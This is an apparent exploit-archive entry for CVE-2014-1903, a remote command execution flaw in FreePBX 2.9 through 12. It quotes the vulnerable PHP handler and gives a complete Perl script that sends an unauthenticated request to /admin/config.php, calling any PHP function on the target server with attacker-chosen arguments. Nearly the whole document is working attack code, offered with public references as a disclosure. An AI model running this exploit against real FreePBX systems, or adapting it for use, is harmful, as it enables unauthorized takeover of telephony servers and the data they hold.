"FreePBX 2.11.0 - Remote Command Execution"

Author: @0x00string

Platform: php

Release date: 2014-03-12

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;

# Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution
# Google Dork: n/a
# Date: 2/25/14
# Exploit Author: @0x00string
# Vendor Homepage: http://www.freepbx.org/
# Software Link: http://mirror.freepbx.org/freepbx-2.11.0.tar.gz
# Version: 2.11 tested working
# Tested on: Ubuntu 12.04, 13.10
# CVE : CVE-2014-1903


#	References:
#	http://seclists.org/bugtraq/2014/Feb/42
#	http://issues.freepbx.org/browse/FREEPBX-7123
#	http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1903
#
#	Developer Advisory:
#	http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice



# in /admin/config.php
#	// handle special requests
#	if (!isset($no_auth) && isset($_REQUEST['handler'])) {
#		$module = isset($_REQUEST['module'])	? $_REQUEST['module']	: '';
#		$file 	= isset($_REQUEST['file'])		? $_REQUEST['file']		: '';
#		fileRequestHandler($_REQUEST['handler'], $module, $file);
#		exit();
#	}


# in /admin/library/view.functions.php
#	    case 'api':
#	      if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) {
#	        $function = $_REQUEST['function'];
#	        $args = isset($_REQUEST['args'])?$_REQUEST['args']:'';
#	
#	        //currently works for one arg functions, eventually need to clean this up to except more args
#	        $result = $function($args);
#	        $jr = json_encode($result);
#	      } else {
#	        $jr = json_encode(null);
#	      }
#	      header("Content-type: application/json");
#	      echo $jr;
#	    break;


$| = 1;

my $sock = new IO::Socket::INET (
    PeerHost => $ARGV[0],
    PeerPort => '80',
    Proto => 'tcp',
);
die "$!\n" unless $sock;
my $func = $ARGV[1];
my $args = "";
my $i = 0;
my $max = 1;
foreach(@ARGV) {
	if ($i > 1) {
		$args .= $_;
	}
	unless($i > (scalar(@ARGV) - 2)) {
		$args .= "%20";
	}
	$i++;
}
my $payload = "display=A&handler=api&file=A&module=A&function=" . $func . "&args=" . $args;
chomp($payload);
print "payload is " . $payload . "\n";
my $packet = 	"GET http://" . $ARGV[0] . "/admin/config.php?" . $payload . "\r\n\r\n";
my $size = $sock->send($packet);
shutdown($sock, 1);
my $resp;
$sock->recv($resp, 1024);
print $resp . "\n";
$sock->close();
exit(0);